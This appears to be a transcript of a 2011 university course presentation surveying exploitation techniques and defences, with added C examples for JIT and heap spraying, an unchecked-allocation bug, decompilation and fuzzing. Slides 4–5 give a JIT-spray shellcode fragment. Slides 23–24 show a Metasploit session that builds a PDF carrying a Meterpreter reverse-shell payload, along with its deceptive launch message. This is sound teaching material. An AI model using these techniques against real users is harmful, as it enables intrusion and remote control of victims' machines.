
EECS 354: A Survey of Techniques to Facilitate Exploitation

Jonathan Friedman, Max Goldman, Brian Lange, Josiah Matlack, Aaron Steinfeld. EECS 354: A Survey of Techniques to Facilitate Exploitation. November 29, 2011. Overview: JIT Spraying, Heap Spraying, Application-specific Exploits, Decompilers, File Format Vulnerabilities, Demo.


Presentation Transcript


  1. Jonathan Friedman, Max Goldman, Brian Lange, Josiah Matlack, Aaron Steinfeld. EECS 354: A Survey of Techniques to Facilitate Exploitation. November 29, 2011

  2. Overview • JIT Spraying • Heap Spraying • Application-specific Exploits • Decompilers • File Format Vulnerabilities • Demo

  3. JIT Spraying • Introduced by Dionysus Blazakis in 2010 • Designed to overcome ASLR and DEP • Code emitted by a JIT compiler lives in executable memory, so it is a place to run attacker-chosen bytes that DEP does not block • "Spraying": the attacker makes the JIT emit many copies of the same function so that its code covers a large part of the heap • Demonstrated with ActionScript in Flash Player: the sprayed function is one long expression of constants combined with xor • The JIT turns each constant into a 5-byte XOR EAX, imm32, and because the sprayed region is large its layout is predictable enough that the attacker can guess an address inside it • Jumping one byte into the first instruction makes the CPU decode the attacker's immediate bytes as instructions instead of the XORs the JIT intended

  4. JIT Spraying (cont) • ActionScript source of one sprayed function; the constants are chosen by the attacker:

    var y = (
      0x3c54d0d9 ^
      0x3c909058 ^
      0x3c59f46a ^
      0x3c90c801 ^
      0x3c9030d9 ^
      0x3c53535b
    )

  • Code the Flash JIT emits for it, decoded the way the JIT intended (address, bytes, instruction):

    03470069  B8 D9D0543C   MOV EAX, 3C54D0D9
    0347006E  35 5890903C   XOR EAX, 3C909058
    03470073  35 6AF4593C   XOR EAX, 3C59F46A
    03470078  35 01C8903C   XOR EAX, 3C90C801
    0347007D  35 D930903C   XOR EAX, 3C9030D9
    03470082  35 5B53533C   XOR EAX, 3C53535B

  5. JIT Spraying (cont) • The same bytes decoded from 0347006A, one byte past the MOV opcode. The immediates now execute as instructions. Each 3C 35 pair is a harmless CMP AL, 35 whose 35 is the opcode byte of the next XOR, so the hidden stream stays aligned across every term:

    0347006A  D9D0   FNOP
    0347006C  54     PUSH ESP
    0347006D  3C 35  CMP AL, 35
    0347006F  58     POP EAX
    03470070  90     NOP
    03470071  90     NOP
    03470072  3C 35  CMP AL, 35
    03470074  6A F4  PUSH -0C
    03470076  59     POP ECX
    03470077  3C 35  CMP AL, 35
    03470079  01C8   ADD EAX, ECX
    0347007B  90     NOP
    0347007C  3C 35  CMP AL, 35
    0347007E  D930   FSTENV DS:[EAX]

  • What the fragment does: PUSH ESP / POP EAX and PUSH -0C / POP ECX / ADD EAX, ECX leave EAX = ESP - 12; FSTENV [EAX] then stores the FPU environment, whose saved instruction pointer (offset 12, the address of the FNOP) lands exactly at [ESP]. This is the usual GetPC step: the sprayed code learns its own address without relying on any fixed one • Each constant carries only three payload bytes, so every instruction, or group of instructions, must fit exactly three bytes; the NOPs after POP EAX, ADD EAX, ECX and FSTENV are padding to keep that alignment
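  The packing on slides 4 and 5 as runnable C, added here as an example; this is not code from the slides or from Flash Player's JIT. jit_pack() shows how three attacker-chosen bytes plus the 0x3C "eater" byte become one 32-bit constant, jit_emit() is a model of the instruction sequence slide 4 shows the JIT producing (MOV EAX, imm32 then XOR EAX, imm32 per term; a real JIT may emit prologue and other code around it), and jit_payload_at_offset1() recovers the byte stream that executes from base+1, which for the slide's six constants is exactly the instruction bytes on slide 5 with the 3C 35 pairs removed.

```c
/* Added example, not from the slides or from Flash Player: a model of the
 * XOR-immediate JIT spray.  jit_pack() builds one constant, jit_emit() models
 * the JIT output shown on slide 4, jit_payload_at_offset1() shows what the CPU
 * executes if control lands one byte into the first instruction. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* 0x3C is the opcode of CMP AL, imm8 (2 bytes).  Stored as the high byte of
 * each constant it lands last in memory and swallows the 0x35 (XOR EAX, imm32)
 * opcode of the following term, keeping the hidden stream aligned. */
#define EATER 0x3Cu

/* Pack three payload bytes, in execution order, into one little-endian imm32. */
uint32_t jit_pack(uint8_t b0, uint8_t b1, uint8_t b2) {
    return (uint32_t)b0 | ((uint32_t)b1 << 8) | ((uint32_t)b2 << 16) | (EATER << 24);
}

/* Model of the JIT output for y = (c[0] ^ c[1] ^ ... ^ c[n-1]).
 * Returns the number of bytes written, or 0 if `cap` is too small. */
size_t jit_emit(const uint32_t *c, size_t n, uint8_t *out, size_t cap) {
    size_t pos = 0;
    for (size_t i = 0; i < n; i++) {
        if (pos + 5 > cap) return 0;
        out[pos++] = (i == 0) ? 0xB8 : 0x35;            /* MOV EAX,imm32 / XOR EAX,imm32 */
        for (int k = 0; k < 4; k++)
            out[pos++] = (uint8_t)(c[i] >> (8 * k));    /* imm32, little-endian */
    }
    return pos;
}

/* Collect the bytes the CPU executes if control lands at base+1: the payload
 * triple of each term with the 3C 35 pairs stripped.  Returns 0 if any term
 * lacks the eater byte, because the hidden stream would then desynchronise. */
size_t jit_payload_at_offset1(const uint8_t *code, size_t len, uint8_t *out, size_t cap) {
    size_t n = 0;
    for (size_t pos = 1; pos + 4 <= len && n + 3 <= cap; pos += 5) {
        if (code[pos + 3] != EATER) return 0;
        memcpy(out + n, code + pos, 3);
        n += 3;
    }
    return n;
}

int main(void) {
    /* The six constants from slide 4. */
    const uint32_t slide[] = {0x3c54d0d9, 0x3c909058, 0x3c59f46a,
                              0x3c90c801, 0x3c9030d9, 0x3c53535b};
    uint8_t code[64], payload[32];
    size_t n = jit_emit(slide, 6, code, sizeof code);
    size_t p = jit_payload_at_offset1(code, n, payload, sizeof payload);

    printf("JIT output as intended (%zu bytes):", n);
    for (size_t i = 0; i < n; i++) printf(" %02X", code[i]);
    printf("\nhidden stream from base+1 (%zu bytes):", p);
    for (size_t i = 0; i < p; i++) printf(" %02X", payload[i]);
    printf("\n");
    return 0;
}
```

  The constraint the example makes visible is the three-byte budget per term: D9 D0 54 is FNOP plus PUSH ESP, 58 90 90 is POP EAX plus two NOPs, and a four-byte instruction cannot be used at all, which is why JIT-sprayed payloads are written from short instructions with NOP padding.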

  6. JIT Spraying (cont) • Defenses exist • Signature detection: scan emitted code for the long runs of NOP-like bytes a spray produces • High false-positive rate, since legitimate JIT output contains such runs too • Heuristics: look at the values being xored (for example many constants sharing the same high byte, as on slide 4) • Stateful detection: look for the short jumps that chain sprayed blocks together

  7. Heap Spraying • Not a memory-corruption bug by itself: a technique used together with one (a heap overflow, use-after-free or similar) to overcome address space randomization • The attacker allocates many "blocks" throughout the heap, each containing a NOP sled followed by the malicious code • When the corrupted pointer or return address is redirected anywhere into the sprayed region, it very probably lands in a sled and slides into the shellcode • This increases the chance of the malicious code being executed without the attacker needing an exact address

  8. Heap Spraying (cont)

  9. NOZZLE: Heap Spraying Defense • Developed by Microsoft Research in 2008 (published at USENIX Security 2009) • Defends against heap spraying by: • Inspecting each individual object on the heap as if it were x86 code, looking for NOP sleds followed by shellcode • Raising an alarm only when a high proportion of the heap consists of such objects, because a single object that happens to look like code is common and would be a false positive
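  A simplified version of the two-level idea on slide 9, added here as an example and not NOZZLE's own code (NOZZLE disassembles each object and scores how much of it could serve as a landing pad; this version only measures the run of single-byte NOP-equivalents at the start of an object). The "heap" is a constructed array of objects: eight sprayed blocks plus three benign ones, one of which, a string of 'A' characters (0x41, INC ECX), is there to show the false-positive case that makes the heap-level threshold necessary.

```c
/* Added example, not NOZZLE's own code: a run-length version of the
 * object-level and heap-level checks on slide 9, run over a constructed heap. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

typedef struct { const uint8_t *data; size_t len; } heap_obj;

/* Single-byte x86 instructions that classic sleds are built from:
 * 0x90 NOP and 0x40-0x4F INC/DEC reg (32-bit mode). */
static int is_sled_byte(uint8_t b) { return b == 0x90 || (b >= 0x40 && b <= 0x4F); }

/* Length of the sled run at the start of an object. */
size_t sled_run(const uint8_t *p, size_t len) {
    size_t n = 0;
    while (n < len && is_sled_byte(p[n])) n++;
    return n;
}

/* Object-level test: a sled of at least min_sled bytes with something after it. */
int object_suspicious(const uint8_t *p, size_t len, size_t min_sled) {
    size_t run = sled_run(p, len);
    return run >= min_sled && run < len;
}

/* Heap-level score: fraction of heap bytes sitting in suspicious objects.
 * A spray has to fill most of the heap to work, so this is what a detector
 * thresholds on; one odd-looking object is not enough to alarm. */
double heap_spray_score(const heap_obj *objs, size_t n, size_t min_sled) {
    size_t total = 0, flagged = 0;
    for (size_t i = 0; i < n; i++) {
        total += objs[i].len;
        if (object_suspicious(objs[i].data, objs[i].len, min_sled)) flagged += objs[i].len;
    }
    return total ? (double)flagged / (double)total : 0.0;
}

/* Constructed sample heap: eight sprayed blocks (64 NOPs then INT3 bytes
 * standing in for shellcode) plus three benign objects.  The 'A' string is a
 * legitimate object that looks like an INC ECX sled. */
#define SPRAY_BLOCKS 8
#define SLED_LEN 64
static uint8_t spray[SPRAY_BLOCKS][SLED_LEN + 8];
static const uint8_t benign_text[] = "GET /index.html HTTP/1.1";
static const uint8_t benign_ints[] = {1, 0, 0, 0, 2, 0, 0, 0, 3, 0, 0, 0};
static const uint8_t benign_As[] = "AAAAAAAAAA" "AAAAAAAAAA" "AAAAAAAAAA" "AAAAAAAAAA" "!";

size_t build_sample_heap(heap_obj *out, size_t cap, int with_spray) {
    size_t n = 0;
    if (with_spray) {
        for (size_t i = 0; i < SPRAY_BLOCKS && n < cap; i++) {
            memset(spray[i], 0x90, SLED_LEN);
            memset(spray[i] + SLED_LEN, 0xCC, 8);
            out[n].data = spray[i]; out[n].len = sizeof spray[i]; n++;
        }
    }
    if (n < cap) { out[n].data = benign_text; out[n].len = sizeof benign_text - 1; n++; }
    if (n < cap) { out[n].data = benign_ints; out[n].len = sizeof benign_ints; n++; }
    if (n < cap) { out[n].data = benign_As; out[n].len = sizeof benign_As - 1; n++; }
    return n;
}

int main(void) {
    heap_obj heap[16];
    size_t n = build_sample_heap(heap, 16, 1);
    for (size_t i = 0; i < n; i++)
        printf("object %2zu: %3zu bytes, sled run %3zu, suspicious=%d\n", i, heap[i].len,
               sled_run(heap[i].data, heap[i].len), object_suspicious(heap[i].data, heap[i].len, 32));
    printf("heap score (min sled 32): %.3f\n", heap_spray_score(heap, n, 32));
    printf("heap score (min sled 48): %.3f\n", heap_spray_score(heap, n, 48));
    n = build_sample_heap(heap, 16, 0);
    printf("benign-only heap score (min sled 48): %.3f\n", heap_spray_score(heap, n, 48));
    return 0;
}
```

  With the sled threshold at 32 the 'A' string is flagged too; at 48 it is not, and the sprayed heap still scores well above 0.8 while the benign-only heap scores 0. Tuning that threshold is exactly the false-positive trade-off slide 6 mentions for the JIT-spray signatures.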

  10. Application-specific Exploits • Exploit a vulnerability in an application's own logic to corrupt memory • Can be quite complex, and difficult to prevent or debug • To help prevent these exploits, code should be tested extensively • Error codes are your friend: check them, and in particular check every allocation's return value

  11. Application-specific Exploits (cont) • Example: Adobe Flash • A parameter read from the file can be set to a negative value • That guarantees a failed allocation, whose NULL return value is never checked • The program then does pointer arithmetic between this NULL pointer and a user-supplied value and writes through the result • This lets the user write to a chosen address • But it isn't directly useful on its own, because the value written is only marginally of the attacker's choosing • So what do we do?

  12. Application-specific Exploits (cont) • Example (cont): ActionScript VM • A Flash file can also carry ActionScript bytecode, which the ActionScript VM executes • The VM verifies that bytecode using bitmasks stored in memory, then executes it directly • Overwriting those bitmasks with the write from the previous slide lets unverified bytecode run • Now save the return address on the stack, replace it with a chosen pointer, and execute a return to jump to that pointer (presumably shellcode loaded from the Flash file) • Then restore the saved return address and return as if nothing happened
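  The bug pattern on slides 10 and 11 in reduced form, added as an example: this is hypothetical C, not Flash Player's code, with the vulnerable allocation and store next to a hardened version. The names array_t, vuln_array_new and safe_array_new are invented for the illustration.

```c
/* Added example, not Flash Player's code: a hypothetical reduction of the
 * pattern on slides 10-11 (negative size, unchecked allocation, pointer
 * arithmetic on the NULL result), beside a hardened version. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

typedef struct { uint32_t *items; int count; } array_t;

/* VULNERABLE: `count` comes straight from the file.  A negative count becomes
 * a huge size_t, malloc() fails and returns NULL, and nobody checks. */
array_t vuln_array_new(int count) {
    array_t a;
    a.count = count;
    a.items = malloc((size_t)count * sizeof(uint32_t));   /* return value never checked */
    return a;
}

/* VULNERABLE: the write that follows.  With items == NULL the store goes to
 * address 4*idx, so the attacker picks the address; the value stored is
 * whatever the program would have stored anyway, the "only marginally of the
 * hacker's choosing" limitation on slide 11. */
void vuln_array_set(array_t *a, uint32_t idx, uint32_t val) {
    a->items[idx] = val;
}

/* Where vuln_array_set() would write, computed without dereferencing so the
 * effect can be inspected safely. */
uintptr_t vuln_array_target(const array_t *a, uint32_t idx) {
    return (uintptr_t)a->items + (uintptr_t)idx * sizeof(uint32_t);
}

/* HARDENED: reject negative sizes, keep the size multiplication from
 * wrapping, and check the allocation result.  0 on success, -1 on failure. */
int safe_array_new(array_t *out, int count) {
    if (count < 0) return -1;
    if ((size_t)count > SIZE_MAX / sizeof(uint32_t)) return -1;
    out->items = calloc((size_t)count, sizeof(uint32_t));
    if (out->items == NULL) return -1;                  /* the missing check */
    out->count = count;
    return 0;
}

/* HARDENED: bounds-checked store. */
int safe_array_set(array_t *a, uint32_t idx, uint32_t val) {
    if (a->items == NULL || idx >= (uint32_t)a->count) return -1;
    a->items[idx] = val;
    return 0;
}

int main(void) {
    array_t v = vuln_array_new(-1);   /* attacker-controlled count from the file */
    printf("vulnerable: items=%p, a store at idx 0x1000 would hit 0x%lx\n",
           (void *)v.items, (unsigned long)vuln_array_target(&v, 0x1000));
    /* vuln_array_set(&v, 0x1000, 42) is the bug itself: it writes to 0x4000
     * (a crash on most systems, memory corruption if that page is mapped). */

    array_t s;
    printf("hardened: count -1 -> %d\n", safe_array_new(&s, -1));
    if (safe_array_new(&s, 4) == 0) {
        printf("hardened: idx 4 of 4 -> %d, idx 3 -> %d\n",
               safe_array_set(&s, 4, 1), safe_array_set(&s, 3, 7));
        free(s.items);
    }
    return 0;
}
```

  The hardened version fixes three things, not one: the sign of the count, the possible wrap in count * sizeof, and the NULL return. Checking only the allocation result would still let a wrapped size produce a buffer far smaller than `count` implies.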

  13. Decompilers • Decode the binary-file format (the loader) • Decode the machine instructions into assembly code for that machine • Perform semantic analysis to recover some low-level data types, such as long variables, and to simplify the decoded instructions based on their semantics

  14. Decompilers (cont) • Store the information in a suitable intermediate representation. If a suitable intermediate language is used, the remaining steps can be used with any assembly language to generate any procedural HLL code. • Perform data flow analysis to remove low-level aspects of the intermediate representation that do not exist in HLLs, e.g. registers, condition codes, stack references.

  15. Decompilers (cont) • Perform control flow analysis to recover the control structures available in each procedure (i.e. loops, conditionals and their nesting level) • Perform type analysis to recover HLL data types such as arrays and structures • Generate HLL code from the transformed intermediate code
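  The data-flow step on slide 14, the one that removes registers, on a toy three-address IR, added here as an example; it is not a decompiler's real implementation, which works on a richer IR and also eliminates condition codes and stack slots. The algorithm is the usual forward substitution: a register that is read exactly once is folded into its use, and a register read more than once becomes a named local. The IR layout (ir_t, register names r<n>, the "ret" pseudo-destination) and the sample block are constructed for the example.

```c
/* Added example, not a real decompiler's code: forward substitution of
 * single-use registers on a constructed three-address IR. */
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAXREG 16
#define EXPR_LEN 128

/* One instruction: dst = lhs op rhs, or dst = lhs when op == 0.
 * dst "ret" returns lhs.  Registers are r<n>; anything else is an argument
 * name or a literal. */
typedef struct { const char *dst; const char *lhs; char op; const char *rhs; } ir_t;

static int is_reg(const char *s) { return s[0] == 'r' && s[1] >= '0' && s[1] <= '9'; }
static int reg_num(const char *s) { return atoi(s + 1); }

static void append(char *out, size_t cap, const char *fmt, ...) {
    size_t used = strlen(out);
    va_list ap;
    va_start(ap, fmt);
    vsnprintf(out + used, cap > used ? cap - used : 0, fmt, ap);
    va_end(ap);
}

/* Render an operand: a register reads back the expression (or local name) it
 * holds; a compound expression is parenthesised so precedence survives. */
static void render(const char *opnd, char exprs[][EXPR_LEN], const int *compound, char *out) {
    if (!is_reg(opnd)) { snprintf(out, EXPR_LEN, "%s", opnd); return; }
    int r = reg_num(opnd);
    snprintf(out, EXPR_LEN, compound[r] ? "(%s)" : "%s", exprs[r]);
}

/* Registers read exactly once are folded into their use; registers read more
 * than once (or never) are emitted as locals v<n>.  Writes HLL text into out. */
void decompile_block(const ir_t *ir, int n, char *out, size_t cap) {
    char exprs[MAXREG][EXPR_LEN] = {{0}};
    int uses[MAXREG] = {0}, compound[MAXREG] = {0};
    for (int i = 0; i < n; i++) {                       /* count reads of each register */
        if (is_reg(ir[i].lhs)) uses[reg_num(ir[i].lhs)]++;
        if (ir[i].op && is_reg(ir[i].rhs)) uses[reg_num(ir[i].rhs)]++;
    }
    out[0] = '\0';
    for (int i = 0; i < n; i++) {
        if (strcmp(ir[i].dst, "ret") == 0) {
            const char *v = is_reg(ir[i].lhs) ? exprs[reg_num(ir[i].lhs)] : ir[i].lhs;
            append(out, cap, "return %s;\n", v);
            continue;
        }
        char l[EXPR_LEN], r[EXPR_LEN], e[EXPR_LEN];
        render(ir[i].lhs, exprs, compound, l);
        if (ir[i].op) {
            render(ir[i].rhs, exprs, compound, r);
            snprintf(e, EXPR_LEN, "%s %c %s", l, ir[i].op, r);
        } else {
            snprintf(e, EXPR_LEN, "%s", l);
        }
        int d = reg_num(ir[i].dst);
        if (uses[d] == 1) {                             /* fold into its single use */
            strcpy(exprs[d], e);
            compound[d] = ir[i].op != 0;
        } else {                                        /* keep it as a named local */
            append(out, cap, "int v%d = %s;\n", d, e);
            snprintf(exprs[d], EXPR_LEN, "v%d", d);
            compound[d] = 0;
        }
    }
}

int main(void) {
    /* Constructed block for f(a, b): r1 = a + b; r2 = r1 * r1; r3 = r2 - 1; ret r3 */
    const ir_t block[] = {
        {"r1", "a", '+', "b"},
        {"r2", "r1", '*', "r1"},
        {"r3", "r2", '-', "1"},
        {"ret", "r3", 0, NULL},
    };
    char out[256];
    decompile_block(block, 4, out, sizeof out);
    fputs(out, stdout);
    return 0;
}
```

  r1 is read twice, so it survives as the local v1; r2 and r3 are read once each and disappear into the return expression. A real pass has to do the same across control-flow edges, which is why slide 15's control flow analysis comes after it.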

  16. Decompilers (cont)

  17. File Format Vulnerabilities In the news… • Duqu • Installer recently found in the form of a .doc file (the document carried an exploit for a TrueType font parsing bug in the Windows kernel) • iOS Jailbreaks • Have taken advantage of PDF and TIFF handling vulnerabilities

  18. File Format Vulnerabilities (cont) At their most abstract level: • Things handle files: programs and operating systems parse documents, images and videos • Specially craft the file, and you may be able to manipulate the thing that parses it • Outcomes range from a crash, to help with reverse engineering, to arbitrary code execution

  19. Why so popular? • 1. They're more stealthy: the payload arrives inside a document the victim expects to open • 2. They're getting easier to do: fuzzers find the bugs and frameworks automate the exploits

  20. Tools of the Trade • File format fuzzers • 4f and Metasploit • Brute-force approach: mutate a valid file many times, feed each variant to the target, and watch for crashes • Metasploit also automates the attack itself once a bug is known, which is what makes these exploits usable by script kiddies
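  The brute-force approach on slides 18 and 20 in miniature, added as an example; it is not 4f or Metasploit. The file format ("TOYF" magic, then chunks of a 32-bit length and a payload), the seed file and the PRNG are constructed for the example. The parser under test has the classic length-field bug: its bounds check computes `off + len`, which wraps in 32-bit arithmetic, so a chunk length near 0xFFFFFFFF looks in-bounds and a real parser would then copy past the end of the buffer. The fuzzer mutates the seed and uses the disagreement between the buggy check and a correct one as its crash oracle, which is what a fuzzer with a harness around the real parser would observe as a crash.

```c
/* Added example, not 4f or Metasploit: a mutation fuzzer for a constructed
 * chunked file format, with a wrap-prone length check beside a correct one. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed toy format: "TOYF" magic, then chunks of [u32 LE length][payload]. */
static const uint8_t seed_file[] = {
    'T', 'O', 'Y', 'F',
    4, 0, 0, 0, 'a', 'b', 'c', 'd',
    2, 0, 0, 0, 'x', 'y'
};
#define SEED_LEN ((uint32_t)sizeof seed_file)   /* 18 bytes */

static uint32_t rd32(const uint8_t *p) {
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}
static void wr32(uint8_t *p, uint32_t v) { for (int i = 0; i < 4; i++) p[i] = (uint8_t)(v >> (8 * i)); }

/* BUGGY bounds check: off + len wraps at 2^32, so a huge chunk passes. */
int chunk_fits_naive(uint32_t off, uint32_t len, uint32_t total) { return off + len <= total; }
/* CORRECT bounds check: never forms the sum. */
int chunk_fits_safe(uint32_t off, uint32_t len, uint32_t total) { return off <= total && len <= total - off; }

/* Oracle: walk the chunk list with the safe check and return 1 if the naive
 * check would have accepted a chunk the safe one rejects, i.e. a parser using
 * the naive check would read `len` bytes past the end.  0 otherwise, including
 * for well-formed files and for files both checks reject. */
int chunk_discrepancy(const uint8_t *f, uint32_t total) {
    if (total < 4 || memcmp(f, "TOYF", 4) != 0) return 0;
    uint32_t off = 4;
    while (off < total) {
        if (!chunk_fits_safe(off, 4, total)) return 0;      /* truncated header */
        uint32_t len = rd32(f + off);
        off += 4;
        if (!chunk_fits_safe(off, len, total)) return chunk_fits_naive(off, len, total);
        off += len;
    }
    return 0;
}

/* xorshift32: a fixed seed makes every run, and every hit, reproducible. */
static uint32_t rng_state = 1;
static uint32_t rng(void) {
    uint32_t x = rng_state;
    x ^= x << 13; x ^= x >> 17; x ^= x << 5;
    return rng_state = x;
}

/* One mutation of the seed: a bit flip, a random byte, or an "interesting"
 * 32-bit value dropped on a 4-byte-aligned slot.  The last strategy is the
 * one that lands on length fields. */
static void mutate(uint8_t *buf, uint32_t len) {
    static const uint32_t interesting[] = {0, 1, 0x7FFFFFFF, 0x80000000, 0xFFFFFFFE, 0xFFFFFFFF};
    switch (rng() % 3) {
    case 0: buf[rng() % len] ^= (uint8_t)(1u << (rng() % 8)); break;
    case 1: buf[rng() % len] = (uint8_t)rng(); break;
    default: wr32(buf + 4 * (rng() % (len / 4)), interesting[rng() % 6]); break;
    }
}

/* Brute-force loop: mutate, run the oracle, count hits.  The first hit is
 * copied to `first_hit` (SEED_LEN bytes) so it can be replayed. */
int fuzz_lengths(int iterations, uint32_t seed, uint8_t *first_hit) {
    int hits = 0;
    rng_state = seed ? seed : 1;
    for (int i = 0; i < iterations; i++) {
        uint8_t buf[SEED_LEN];
        memcpy(buf, seed_file, SEED_LEN);
        mutate(buf, SEED_LEN);
        if (chunk_discrepancy(buf, SEED_LEN)) {
            if (hits == 0 && first_hit) memcpy(first_hit, buf, SEED_LEN);
            hits++;
        }
    }
    return hits;
}

int main(void) {
    uint8_t hit[SEED_LEN];
    int hits = fuzz_lengths(2000, 12345, hit);
    printf("%d of 2000 mutants pass the naive check but fail the safe one\n", hits);
    if (hits) {
        printf("first such file:");
        for (uint32_t i = 0; i < SEED_LEN; i++) printf(" %02X", hit[i]);
        printf("\n");
    }
    return 0;
}
```

  Only the "interesting value" strategy finds this bug: a bit flip or a single random byte cannot push a length high enough to wrap the addition. That is the general lesson behind the slide's "brute force" remark: the mutation set, not the iteration count, decides which bug classes a fuzzer can reach.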

  21. Prevention • Don't be stupid: don't open files from untrusted sources • Client-side antivirus • Keeping software up to date

  22. PDF Exploit Using Metasploit • Metasploit's adobe_pdf_embedded_exe module embeds an executable in a .pdf file and adds a /Launch action so that it runs when the document is opened • This is not a memory corruption exploit: the reader shows a warning dialog, and the attacker's LAUNCH_MESSAGE text (see the option list on slide 24) is there to persuade the user to click Open • Exploited on Windows XP SP3, with Adobe Reader 8.0 and below • Also works on Foxit Reader • Once the user accepts the dialog, the embedded .exe runs automatically

  23. Exploit code • msfconsole session generating the file (the "Parseing" spelling is the module's own output):

    msf exploit(adobe_pdf_embedded_exe) > set PAYLOAD windows/meterpreter/reverse_tcp
    PAYLOAD => windows/meterpreter/reverse_tcp
    msf exploit(adobe_pdf_embedded_exe) > set LHOST localhost
    LHOST => localhost
    msf exploit(adobe_pdf_embedded_exe) > set INFILENAME test.pdf
    INFILENAME => test.pdf
    msf exploit(adobe_pdf_embedded_exe) > exploit
    [*] Started reverse handler
    [*] Reading in 'test.pdf'...
    [*] Parseing 'test.pdf'...
    [*] Parseing Successfull.
    [*] Using 'windows/meterpreter/reverse_tcp' as payload...
    [*] Creating 'evil.pdf' file...
    [*] Generated output file /home/jwm903/.msf3/modules/exploits/data/exploits/evil.pdf
    [*] Exploit completed, but no session was created.

  • "No session was created" is expected at this point: the module only writes evil.pdf and starts the reverse handler; a Meterpreter session appears when a victim opens the file and accepts the launch dialog • LHOST is set to localhost here for the demo; a real payload needs the attacker's reachable address

  24. Additional Options (as listed by the module)

    EXENAME                The Name of payload exe.
    FILENAME               The output filename. (default: evil.pdf)
    INFILENAME             The Input PDF filename.
    LAUNCH_MESSAGE         The message to display in the File: area (default: To view the encrypted content please tick the "Do not show this message again" box and press Open.)
    ContextInformationFile The information file that contains context information
    DisablePayloadHandler  Disable the handler code for the selected payload
    EXE::Custom            Use custom exe instead of automatically generating a payload exe
    EXE::FallBack          Use the default template in case the specified one is missing
    EXE::Inject            Set to preserve the original EXE function
    EXE::OldMethod         Set to use the substitution EXE generation method.
    EXE::Path              The directory in which to look for the executable template
    EXE::Template          The executable template file name.
    EnableContextEncoding  Use transient context when encoding payloads
    VERBOSE                Enable detailed status messages
    WORKSPACE              Specify the workspace for this module
    WfsDelay               Additional delay when waiting for a session

  25. DEMO
